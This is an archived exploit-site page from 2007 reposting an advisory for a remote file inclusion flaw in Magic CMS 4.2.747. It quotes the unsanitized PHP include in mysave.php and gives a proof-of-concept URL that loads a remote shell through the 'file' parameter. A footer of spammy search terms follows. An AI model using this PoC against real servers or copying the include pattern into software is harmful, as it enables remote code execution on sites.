about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Magic CMS 4.2.747 (mysave.php file) Remote File Include Vulnerability




2007-03-08 Magic CMS 4.2.747 (mysave.php file) Remote File Include Vulnerability 
Rated as : Moderate Risk

                            \#'#/
                             (-.-)
   ---------------------oOO---(_)---OOo---------------------
   | Magic CMS v4.2.747 (mysave.php) Remote File Inclusion |
   |        (works only with register_globals = on)        |
   |                     coded by DNX                      |
   ---------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: www.geo-soft.net/de-ch/
[!] Detected: 03.03.2007
[!] Reported: 03.03.2007
[!] Remote: yes

[!] Background: Magic CMS is an easy to use content 
    management system based on PHP.

[!] Bug: $file in mysave.php line 3 
         
         @include($file."/myconfig.php");
         
[!] PoC: http://[site]/[path]/mysave.php?file=[shell]

[!] Solution: Waiting for patch/update. No response from 
    vendor.

securitydot.net - 2007-03-08

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 11:59:30 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
htmlarea3 School sex Sexcy Gril addentry WWW.KARALA search+mod cnitzz.com erotik+tea 9000 howto jpjak wwwsex89.c MySQL+4.0. jkmhgj auto exec news for / caleb Www.aishwa Www.aishwa mambo admi Sexsi vodi TATA gay, Indionsex. ww.winesh. video+dewi gui eros t585t www.sexe t494t 200 /compo WWW.TAMILS Www.ilu.co easynews rep maxcpm.inf Www.Indian ms 06-40 horse 2.6.20-16- www.sraind number of lo98l shi2.cn southsexyg php-nuke 2 vidio sex masalaraja www.pornhu